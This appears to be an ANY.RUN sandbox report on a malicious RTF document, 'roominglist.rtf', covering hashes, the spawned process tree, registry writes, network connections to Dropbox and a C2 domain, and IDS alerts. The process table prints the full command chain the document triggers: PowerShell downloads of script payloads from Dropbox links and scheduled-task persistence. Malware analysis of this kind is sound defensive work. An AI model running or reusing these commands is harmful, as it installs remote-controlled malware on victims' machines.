File name: | roominglist.rtf |
Full analysis: | https://app.any.run/tasks/af7ad2aa-f0dd-4ac1-b88c-3a8964c8a50d |
Verdict: | Malicious activity |
Analysis date: | February 19, 2019, 10:37:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 024D4BD30BD1A095EF37193C11C2B67A |
SHA1: | BC3E7D16245C2CF7392EEC9F0B3846F024093331 |
SHA256: | 73D94299D43AB7C65BC088F04E8314868AC0930376F74B91B898F169CE16F578 |
SSDEEP: | 12288:EH1vH1YH1HH16H1ZH1bH1/H1lH1qH1lH1DH1IH1O:D |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57433 |
---|---|
CharactersWithSpaces: | 507 |
Characters: | 430 |
Words: | 78 |
Pages: | 1 |
TotalEditTime: | 3 minutes |
RevisionNumber: | 2 |
ModifyDate: | 2019:02:18 07:26:00 |
CreateDate: | 2019:02:18 07:23:00 |
LastModifiedBy: | Usuario de Windows |
Author: | Usuario de Windows |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2808 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\roominglist.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3644 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3388 | "C:\Windows\System32\cmd.exe" /c "ping -n 2 localhost & schtasks /create /tn "ChromeSmartStart" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\CSmartStart.js" /sc minute /mo 30 /f & ping -n 2 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://www.dropbox.com/s/2kfui3v0l4icwhh/xAwQVLe1wZni?dl=1”, “%AppData%\\Microsoft\\Network\\Connections\\Pbk\\CSmartStart.js”) & ping -n 2 localhost & schtasks /create /tn "ServiceSmartSart" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\TSmartSart.js" /sc minute /mo 30 /f & ping -n 2 localhost & schtasks /create /tn "GoogleSmartStart" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\WSmartStart.vbs" /sc minute /mo 30 /f & ping -n 2 localhost & schtasks /create /tn "LocalSmartStart" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\LSmartStart.js" /sc minute /mo 30 /f & ping -n 2 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://www.dropbox.com/s/9zb1hv9menriash/mBZAiMKyCcsr?dl=1”, “%AppData%\\Microsoft\\Network\\Connections\\Pbk\\TSmartSart.js”) & ping -n 2 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://www.dropbox.com/s/qiq13n8d7sy0eqe/kyDAc4ReoVZt?dl=1”, “%AppData%\\Microsoft\\Network\\Connections\\Pbk\\WSmartStart.vbs”) & ping -n 2 localhost & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://www.dropbox.com/s/mfo5gvbzoz7gbmd/ij315ZkYcVGN?dl=1”, “%AppData%\\Microsoft\\Network\\Connections\\Pbk\\LSmartStart.js”) & ping -n 2 localhost & ping -n 2 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & ping -n 3 localhost & ipconfig/release & schtasks /run /tn "ServiceSmartSart" & ping -n 30 localhost & schtasks /run /tn "LocalSmartStart" & ping -n 3 localhost & schtasks /run /tn "GoogleSmartStart" & ping -n 3 localhost & schtasks /run /tn "ChromeSmartStart" & ping -n 30 localhost & ipconfig/renew & exit" | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3916 | ping -n 2 localhost | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2180 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2372 | schtasks /create /tn "ChromeSmartStart" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\CSmartStart.js" /sc minute /mo 30 /f | C:\Windows\system32\schtasks.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3032 | ping -n 2 localhost | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3680 | PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://www.dropbox.com/s/2kfui3v0l4icwhh/xAwQVLe1wZni?dl=1”, “C:\Users\admin\AppData\Roaming\\Microsoft\\Network\\Connections\\Pbk\\CSmartStart.js”) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3688 | ping -n 2 localhost | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2264 | schtasks /create /tn "ServiceSmartSart" /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\TSmartSart.js" /sc minute /mo 30 /f | C:\Windows\system32\schtasks.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | 11$ |
Value: 31312400F80A0000010000000000000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1314062366 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1314062480 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1314062481 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: F80A00004CB7BE373FC8D40100000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | g2$ |
Value: 67322400F80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | g2$ |
Value: 67322400F80A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2808) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2808 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9531.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3644 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA118.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3644 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF5306720D16D91E9C.TMP | — | |
MD5:— | SHA256:— | |||
2180 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRCAA9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3680 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BYV49W95SVIL01YIIHJO.temp | — | |
MD5:— | SHA256:— | |||
2180 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFF2D1C43D638FB58B.TMP | — | |
MD5:— | SHA256:— | |||
2628 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRF0DE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3952 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZDGNHKBL9GNS8G5519ZM.temp | — | |
MD5:— | SHA256:— | |||
2316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DYX5LIVRHIOH33ZNM5SZ.temp | — | |
MD5:— | SHA256:— | |||
2628 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF712273D0F0E50826.TMP | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2316 | powershell.exe | 162.125.66.1:443 | www.dropbox.com | Dropbox, Inc. | DE | shared |
3680 | powershell.exe | 162.125.66.1:443 | www.dropbox.com | Dropbox, Inc. | DE | shared |
3952 | powershell.exe | 162.125.66.1:443 | www.dropbox.com | Dropbox, Inc. | DE | shared |
3096 | powershell.exe | 162.125.66.6:443 | uc19c3124e8b1b29fe960ceb8d30.dl.dropboxusercontent.com | Dropbox, Inc. | DE | shared |
3096 | powershell.exe | 162.125.66.1:443 | www.dropbox.com | Dropbox, Inc. | DE | shared |
2316 | powershell.exe | 162.125.66.6:443 | uc19c3124e8b1b29fe960ceb8d30.dl.dropboxusercontent.com | Dropbox, Inc. | DE | shared |
3076 | WScript.exe | 141.255.145.67:666 | groups.us.to | Lost Oasis SARL | NL | unknown |
3036 | powershell.exe | 141.255.145.67:968 | groups.us.to | Lost Oasis SARL | NL | unknown |
2700 | powershell.exe | 141.255.145.67:689 | groups.us.to | Lost Oasis SARL | NL | unknown |
3952 | powershell.exe | 162.125.66.6:443 | uc19c3124e8b1b29fe960ceb8d30.dl.dropboxusercontent.com | Dropbox, Inc. | DE | shared |
Domain | IP | Reputation |
---|---|---|
www.dropbox.com |
| shared |
uc19c3124e8b1b29fe960ceb8d30.dl.dropboxusercontent.com |
| malicious |
uc60c2668a92530ce487b5b92cd6.dl.dropboxusercontent.com |
| malicious |
uc3c5958a0606eb723b87bb34d1e.dl.dropboxusercontent.com |
| malicious |
ucdfc251df6988702f58fecfccd2.dl.dropboxusercontent.com |
| malicious |
groups.us.to |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3680 | powershell.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Dropbox SSL Payload Request |
3952 | powershell.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Dropbox SSL Payload Request |
2316 | powershell.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Dropbox SSL Payload Request |
3096 | powershell.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Dropbox SSL Payload Request |